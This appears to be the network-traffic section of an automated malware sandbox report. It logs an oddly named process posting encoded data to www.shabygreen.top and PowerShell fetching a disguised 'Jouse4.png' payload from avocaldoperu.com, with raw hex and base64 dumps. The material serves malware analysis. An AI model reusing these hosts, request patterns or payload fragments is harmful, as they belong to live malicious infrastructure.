                                                            Data Raw: 34 4e 5a 70 62 3d 46 6a 5a 55 6a 57 43 79 6d 61 6e 43 6a 74 69 57 50 55 4c 36 30 49 73 74 78 74 2b 4b 56 58 64 79 6f 36 4d 42 43 33 37 57 49 74 43 34 73 57 36 45 5a 46 53 4d 6b 44 78 31 55 72 46 54 42 44 57 5a 6e 2b 6b 4f 33 6c 56 37 62 49 36 50 77 46 42 58 32 4d 4c 76 79 71 75 6a 6d 53 53 6b 45 75 54 59 35 75 41 39 65 4c 38 33 4a 2f 68 71 68 66 6f 6f 77 65 47 44 46 79 39 49 73 2b 6f 78 51 76 45 47 35 44 49 41 71 79 63 65 68 39 75 64 33 6a 78 51 66 38 66 76 78 74 44 76 6d 49 42 46 42 2f 43 7a 68 68 6f 69 62 33 77 55 43 71 6b 34 35 35 64 41 6c 65 2f 70 66 77 4e 4e 4a 78 52 73 56 42 47 53 36 73 42 69 71 75 2f 66 31 5a 30 66 70 38 64 6e 58 62 4b 57 6b 36 79 75 42 30 46 56 31 70 46 49 47 33 38 5a 30 34 45 47 37 52 5a 64 30 32 46 77 45 70 56 37 6e 59 54 46 36 73 47 47 6d 46 78 4e 52 73 79 57 30 2b 62 41 55 55 78 37 38 57 4a 4a 2f 52 5a 4f 47 72 6e 36 36 58 56 31 7a 78 36 52 58 41 63 63 54 78 72 71 46 30 6f 78 75 6a 65 6b 62 52 6b 38 53 52 47 4f 36 52 44 65 45 4f 74 4d 69 58 70 54 75 75 4e 41 37 6c 2b 76 [TRUNCATED]
                                                            Data Ascii: 4NZpb= [TRUNCATED]
                                                            Aug 28, 2024 14:04:55.817486048 CEST | 410 | IN | HTTP/1.1 301 Moved Permanently
                                                            Content-Type: application/binary
                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                            Pragma: no-cache
                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                            Date: Wed, 28 Aug 2024 12:04:55 GMT
                                                            Location: https://www.openhandedvision.com/ehr0/
                                                            Server: ESF
                                                            Content-Length: 0
                                                            X-XSS-Protection: 0
                                                            X-Frame-Options: SAMEORIGIN
                                                            X-Content-Type-Options: nosniff
                                                            Connection: close


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            31 | 192.168.2.4 | 49773 | 142.250.186.147 | 80 | 792 | C:\Program Files (x86)\mEdjCLhGENFaxeOtHHyHLogHIxTeNJwCnROkqpaCmxInxofnfbtq\qeKrnFkDzDT.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Aug 28, 2024 14:04:57.501735926 CEST | 520 | OUT | GET /ehr0/?4NZpb=Ihx0gjzggpHnpfOGfxSnw6gJ5cOueV8x4eE1b1b3I+S/q3zjJWKl4z1sGY5aRiTkrNYY7Ux0aZSu93Is89zAj/+h+kKnKfyF/eA8fKZfI/46sMZqkqzIHBU=&8le=9XPp_0_hUrF45X HTTP/1.1
                                                            Host: www.openhandedvision.com
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US,en;q=0.9
                                                            Connection: close
                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                            Aug 28, 2024 14:04:58.729914904 CEST | 558 | IN | HTTP/1.1 301 Moved Permanently
                                                            Content-Type: application/binary
                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                            Pragma: no-cache
                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                            Date: Wed, 28 Aug 2024 12:04:58 GMT
                                                            Location: https://www.openhandedvision.com/ehr0/?4NZpb=Ihx0gjzggpHnpfOGfxSnw6gJ5cOueV8x4eE1b1b3I+S/q3zjJWKl4z1sGY5aRiTkrNYY7Ux0aZSu93Is89zAj/+h+kKnKfyF/eA8fKZfI/46sMZqkqzIHBU%3D&8le=9XPp_0_hUrF45X
                                                            Server: ESF
                                                            Content-Length: 0
                                                            X-XSS-Protection: 0
                                                            X-Frame-Options: SAMEORIGIN
                                                            X-Content-Type-Options: nosniff
                                                            Connection: close


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            32 | 192.168.2.4 | 49774 | 203.161.41.205 | 80 | 792 | C:\Program Files (x86)\mEdjCLhGENFaxeOtHHyHLogHIxTeNJwCnROkqpaCmxInxofnfbtq\qeKrnFkDzDT.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Aug 28, 2024 14:05:04.191656113 CEST | 779 | OUT | POST /r9e8/ HTTP/1.1
                                                            Host: www.shabygreen.top
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US,en;q=0.9
                                                            Accept-Encoding: gzip, deflate, br
                                                            Content-Length: 202
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Cache-Control: no-cache
                                                            Connection: close
                                                            Origin: http://www.shabygreen.top
                                                            Referer: http://www.shabygreen.top/r9e8/
                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                            Data Raw: 34 4e 5a 70 62 3d 41 62 50 69 7a 77 46 30 74 34 44 61 73 41 57 4a 68 7a 74 36 79 56 65 63 5a 31 56 72 31 62 54 77 31 62 73 72 4a 55 43 72 72 50 72 64 73 70 4d 34 76 45 42 39 31 79 65 56 78 33 68 73 6b 79 54 4f 46 66 38 45 70 44 63 34 77 39 5a 31 2b 42 42 72 4f 53 32 4c 76 49 52 62 7a 2f 50 68 65 39 42 61 46 74 6e 52 52 31 75 54 66 4a 63 31 51 44 4a 68 4a 58 31 54 6c 4e 46 66 79 64 44 51 35 31 48 73 4a 6f 2b 67 51 73 75 6e 61 59 65 64 6c 55 65 51 73 2b 50 4e 56 6e 4c 47 37 74 48 6e 6e 77 41 34 49 50 47 73 78 44 77 35 66 35 48 6e 34 52 7a 76 6e 6f 73 6c 45 58 39 65 7a 77 51 36 47 59 47 38 34 67 3d 3d
                                                            Data Ascii: 4NZpb=AbPizwF0t4DasAWJhzt6yVecZ1Vr1bTw1bsrJUCrrPrdspM4vEB91yeVx3hskyTOFf8EpDc4w9Z1+BBrOS2LvIRbz/Phe9BaFtnRR1uTfJc1QDJhJX1TlNFfydDQ51HsJo+gQsunaYedlUeQs+PNVnLG7tHnnwA4IPGsxDw5f5Hn4RzvnoslEX9ezwQ6GYG84g==
                                                            Aug 28, 2024 14:05:04.819679022 CEST | 533 | IN | HTTP/1.1 404 Not Found
                                                            Date: Wed, 28 Aug 2024 12:05:04 GMT
                                                            Server: Apache
                                                            Content-Length: 389
                                                            Connection: close
                                                            Content-Type: text/html
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                            Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            33 | 192.168.2.4 | 49775 | 203.161.41.205 | 80 | 792 | C:\Program Files (x86)\mEdjCLhGENFaxeOtHHyHLogHIxTeNJwCnROkqpaCmxInxofnfbtq\qeKrnFkDzDT.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Aug 28, 2024 14:05:06.721204042 CEST | 799 | OUT | POST /r9e8/ HTTP/1.1
                                                            Host: www.shabygreen.top
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US,en;q=0.9
                                                            Accept-Encoding: gzip, deflate, br
                                                            Content-Length: 222
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Cache-Control: no-cache
                                                            Connection: close
                                                            Origin: http://www.shabygreen.top
                                                            Referer: http://www.shabygreen.top/r9e8/
                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                            Data Raw: 34 4e 5a 70 62 3d 41 62 50 69 7a 77 46 30 74 34 44 61 73 67 6d 4a 6e 56 6c 36 30 31 65 62 63 31 56 72 38 37 54 4b 31 62 67 72 4a 57 75 37 73 39 50 64 73 49 38 34 39 58 5a 39 32 79 65 56 6f 48 68 70 75 53 54 46 46 66 77 32 70 47 6b 34 77 39 64 31 2b 45 6c 72 62 78 65 4d 75 59 52 5a 37 66 50 76 55 64 42 61 46 74 6e 52 52 31 54 47 66 4e 77 31 54 79 5a 68 49 79 41 46 70 74 46 65 6c 74 44 51 79 56 48 6f 4a 6f 2f 50 51 74 7a 76 61 61 6d 64 6c 57 47 51 73 72 76 4d 65 6e 4b 50 2f 74 47 44 6b 69 4e 64 43 63 50 6c 2b 30 59 6c 58 4a 50 61 39 58 69 31 32 5a 4e 79 57 58 5a 74 75 33 5a 4f 4c 62 37 31 6a 6b 6e 32 48 38 79 4b 31 52 61 41 74 76 4a 70 2f 51 43 44 36 58 77 3d
                                                            Data Ascii: 4NZpb=AbPizwF0t4DasgmJnVl601ebc1Vr87TK1bgrJWu7s9PdsI849XZ92yeVoHhpuSTFFfw2pGk4w9d1+ElrbxeMuYRZ7fPvUdBaFtnRR1TGfNw1TyZhIyAFptFeltDQyVHoJo/PQtzvaamdlWGQsrvMenKP/tGDkiNdCcPl+0YlXJPa9Xi12ZNyWXZtu3ZOLb71jkn2H8yK1RaAtvJp/QCD6Xw=
                                                            Aug 28, 2024 14:05:07.326870918 CEST | 533 | IN | HTTP/1.1 404 Not Found
                                                            Date: Wed, 28 Aug 2024 12:05:07 GMT
                                                            Server: Apache
                                                            Content-Length: 389
                                                            Connection: close
                                                            Content-Type: text/html
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                            Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            34 | 192.168.2.4 | 49776 | 203.161.41.205 | 80 | 792 | C:\Program Files (x86)\mEdjCLhGENFaxeOtHHyHLogHIxTeNJwCnROkqpaCmxInxofnfbtq\qeKrnFkDzDT.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Aug 28, 2024 14:05:09.252142906 CEST | 10881 | OUT | POST /r9e8/ HTTP/1.1
                                                            Host: www.shabygreen.top
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US,en;q=0.9
                                                            Accept-Encoding: gzip, deflate, br
                                                            Content-Length: 10302
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Cache-Control: no-cache
                                                            Connection: close
                                                            Origin: http://www.shabygreen.top
                                                            Referer: http://www.shabygreen.top/r9e8/
                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                            Data Raw: 34 4e 5a 70 62 3d 41 62 50 69 7a 77 46 30 74 34 44 61 73 67 6d 4a 6e 56 6c 36 30 31 65 62 63 31 56 72 38 37 54 4b 31 62 67 72 4a 57 75 37 73 39 48 64 73 61 30 34 76 6e 6c 39 33 79 65 56 67 6e 68 6f 75 53 54 69 46 66 35 2f 70 47 59 43 77 34 42 31 2b 69 70 72 4b 67 65 4d 33 49 52 5a 35 66 50 69 65 39 41 51 46 70 4c 56 52 78 7a 47 66 4e 77 31 54 77 78 68 4f 6e 30 46 76 74 46 66 79 64 44 55 35 31 48 41 4a 72 50 31 51 74 32 4e 61 70 75 64 6b 32 57 51 67 34 48 4d 54 6e 4b 42 7a 4e 47 62 6b 69 42 4f 43 66 37 44 2b 78 6b 66 58 4c 54 61 39 79 54 72 71 49 4a 39 43 32 34 77 34 48 70 58 48 63 54 7a 6f 33 62 64 58 4a 33 66 32 79 36 62 69 63 31 6d 71 53 75 31 34 48 4e 43 50 2f 4c 56 32 45 2b 39 43 59 42 2b 49 33 4a 6a 2f 44 5a 4d 4e 65 2b 6c 65 43 7a 44 52 50 36 73 6a 57 46 59 52 51 5a 4c 75 73 46 56 46 55 38 53 38 6f 49 6e 6e 6d 55 55 46 2b 37 4d 32 32 2b 59 48 67 32 56 49 53 35 50 31 57 30 4a 30 55 70 6d 36 61 65 38 71 41 52 67 70 62 33 56 78 64 68 4c 57 50 6e 6c 70 63 69 6e 61 2f 6b 46 30 53 6f 53 34 68 68 68 [TRUNCATED]
                                                            Data Ascii: 4NZpb= [TRUNCATED]
                                                            Aug 28, 2024 14:05:09.964644909 CEST | 533 | IN | HTTP/1.1 404 Not Found
                                                            Date: Wed, 28 Aug 2024 12:05:09 GMT
                                                            Server: Apache
                                                            Content-Length: 389
                                                            Connection: close
                                                            Content-Type: text/html
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                            Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            35 | 192.168.2.4 | 49777 | 203.161.41.205 | 80 | 792 | C:\Program Files (x86)\mEdjCLhGENFaxeOtHHyHLogHIxTeNJwCnROkqpaCmxInxofnfbtq\qeKrnFkDzDT.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Aug 28, 2024 14:05:11.782677889 CEST | 514 | OUT | GET /r9e8/?8le=9XPp_0_hUrF45X&4NZpb=NZnCwFpZhKq0sQLr3EYC0TyIV0Vt7qzpk8sJXmG0u+Dj16JHvnRy3RCRxkJB+yK1MPAIrV8029hJ5TdoPi+z2c1Lq4bOeIsIUJHbQyiTQ7hpVCcnWmpKoKk= HTTP/1.1
                                                            Host: www.shabygreen.top
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US,en;q=0.9
                                                            Connection: close
                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                            Aug 28, 2024 14:05:12.408523083 CEST | 548 | IN | HTTP/1.1 404 Not Found
                                                            Date: Wed, 28 Aug 2024 12:05:12 GMT
                                                            Server: Apache
                                                            Content-Length: 389
                                                            Connection: close
                                                            Content-Type: text/html; charset=utf-8
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                            Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            0 | 192.168.2.4 | 49730 | 104.21.62.20 | 443 | 7616 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            2024-08-28 12:01:11 UTC | 170 | OUT | GET /Jouse4.png HTTP/1.1
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                            Host: avocaldoperu.com
                                                            Connection: Keep-Alive
                                                            2024-08-28 12:01:12 UTC | 690 | IN | HTTP/1.1 200 OK
                                                            Date: Wed, 28 Aug 2024 12:01:12 GMT
                                                            Content-Type: image/png
                                                            Content-Length: 421524
                                                            Connection: close
                                                            Last-Modified: Tue, 27 Aug 2024 22:21:00 GMT
                                                            ETag: "66e94-620b1a7fdeb00"
                                                            Cache-Control: max-age=14400
                                                            CF-Cache-Status: REVALIDATED
                                                            Accept-Ranges: bytes
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dNpGVVnR4QJLGuIr4Wuq%2BkLy2jM25gySd2QS28qKmYDOY2s0NTW%2BmXM6qlKSa820D4H9iAnfxaZp%2BN%2BGUU74%2Ffp5oHzdtd2mNb3kwPg12yShlStAHRW0QxDt%2F4HOzXSjqrxb"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8ba42531df328c51-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            2024-08-28 12:01:12 UTC | 679 | IN | Data Raw: 63 51 47 62 63 51 47 62 75 39 51 68 43 77 42 78 41 5a 76 72 41 68 61 66 41 31 77 6b 42 48 45 42 6d 2b 73 43 6c 48 65 35 71 62 79 31 4f 33 45 42 6d 2b 73 43 69 35 53 42 38 62 34 71 76 35 78 78 41 5a 76 72 41 74 5a 4b 67 63 48 70 61 66 56 59 63 51 47 62 36 77 4c 64 45 6e 45 42 6d 33 45 42 6d 37 70 4f 2f 35 30 56 63 51 47 62 63 51 47 62 36 77 4c 4e 45 2b 73 43 72 53 34 78 79 75 73 43 4d 79 64 78 41 5a 75 4a 46 41 76 72 41 6f 54 67 36 77 49 78 73 74 48 69 63 51 47 62 63 51 47 62 67 38 45 45 36 77 4a 56 70 4f 73 43 6c 5a 47 42 2b 65 79 77 41 77 52 38 79 58 45 42 6d 2b 73 43 65 34 6d 4c 52 43 51 45 36 77 49 57 31 75 73 43 44 4b 71 4a 77 33 45 42 6d 33 45 42 6d 34 48 44 57 5a 4f 44 41 2b 73 43 2f 4b 44 72 41 6b 62 46 75 73 6c 55 55 72 6a 72 41 6b 37 30 63 51 47
                                                            Data Ascii: cQGbcQGbu9QhCwBxAZvrAhafA1wkBHEBm+sClHe5qby1O3EBm+sCi5SB8b4qv5xxAZvrAtZKgcHpafVYcQGb6wLdEnEBm3EBm7pO/50VcQGbcQGb6wLNE+sCrS4xyusCMydxAZuJFAvrAoTg6wIxstHicQGbcQGbg8EE6wJVpOsClZGB+eywAwR8yXEBm+sCe4mLRCQE6wIW1usCDKqJw3EBm3EBm4HDWZODA+sC/KDrAkbFuslUUrjrAk70cQG
                                                            2024-08-28 12:01:12 UTC | 1369 | IN | Data Raw: 62 63 51 47 62 52 75 73 43 67 61 78 78 41 5a 75 41 66 41 72 37 75 48 58 64 63 51 47 62 63 51 47 62 69 30 51 4b 2f 48 45 42 6d 33 45 42 6d 79 6e 77 36 77 49 37 68 33 45 42 6d 2f 2f 53 36 77 4a 52 7a 48 45 42 6d 37 71 38 5a 77 51 41 63 51 47 62 36 77 49 43 64 7a 48 41 63 51 47 62 63 51 47 62 69 33 77 6b 44 48 45 42 6d 33 45 42 6d 34 45 30 42 36 52 30 50 67 6a 72 41 6a 6c 46 63 51 47 62 67 38 41 45 63 51 47 62 63 51 47 62 4f 64 42 31 35 58 45 42 6d 2b 73 43 66 61 32 4a 2b 2b 73 43 63 79 72 72 41 70 44 6a 2f 39 66 72 41 6d 32 7a 36 77 4a 49 69 53 32 52 2b 59 32 7a 69 38 48 33 5a 54 76 6c 5a 53 58 42 4b 66 64 62 69 30 66 79 57 37 57 2f 76 62 4f 4c 77 66 64 71 35 47 69 65 4a 63 45 70 39 31 75 4c 53 43 37 57 54 6e 4c 33 4b 57 50 42 39 31 73 42 79 56 30 74 6b 59
                                                            Data Ascii: bcQGbRusCgaxxAZuAfAr7uHXdcQGbcQGbi0QK/HEBm3EBmynw6wI7h3EBm//S6wJRzHEBm7q8ZwQAcQGb6wICdzHAcQGbcQGbi3wkDHEBm3EBm4E0B6R0PgjrAjlFcQGbg8AEcQGbcQGbOdB15XEBm+sCfa2J++sCcyrrApDj/9frAm2z6wJIiS2R+Y2zi8H3ZTvlZSXBKfdbi0fyW7W/vbOLwfdq5GieJcEp91uLSC7WTnL3KWPB91sByV0tkY
                                                            2024-08-28 12:01:12 UTC | 1369 | IN | Data Raw: 38 46 41 6c 43 55 70 63 6a 48 51 2b 42 79 43 58 71 41 69 6b 4c 32 68 5a 48 53 62 37 31 56 62 31 7a 32 75 4b 58 2f 4f 4a 56 53 75 78 46 43 76 31 7a 34 38 30 6e 6f 36 42 72 64 59 66 51 70 38 42 51 43 74 6b 5a 6c 33 2f 52 4d 35 4b 78 55 5a 43 43 74 79 70 61 2b 51 38 7a 36 57 52 6e 5a 49 4b 46 46 45 76 77 64 77 4a 70 48 52 70 74 36 74 57 31 51 77 6c 67 35 49 48 44 57 53 2f 7a 2f 6d 6e 67 2b 50 33 36 4c 66 72 72 55 2b 6a 4d 56 73 49 50 64 69 2f 4d 77 59 52 7a 35 31 62 37 72 5a 53 61 48 7a 6f 31 4c 72 67 30 75 41 39 53 4a 52 47 4c 64 63 36 45 6a 41 58 56 68 65 35 51 79 58 59 63 57 73 33 36 71 72 54 51 36 32 36 32 66 2f 31 77 66 6c 6c 41 55 35 58 54 4f 59 50 43 71 54 39 67 34 36 6c 64 44 36 33 7a 59 58 4d 52 43 57 44 6b 43 55 43 71 6d 2b 78 7a 64 76 59 74 79 57
                                                            Data Ascii: 8FAlCUpcjHQ+ByCXqAikL2hZHSb71Vb1z2uKX/OJVSuxFCv1z480no6BrdYfQp8BQCtkZl3/RM5KxUZCCtypa+Q8z6WRnZIKFFEvwdwJpHRpt6tW1Qwlg5IHDWS/z/mng+P36LfrrU+jMVsIPdi/MwYRz51b7rZSaHzo1Lrg0uA9SJRGLdc6EjAXVhe5QyXYcWs36qrTQ6262f/1wfllAU5XTOYPCqT9g46ldD63zYXMRCWDkCUCqm+xzdvYtyW
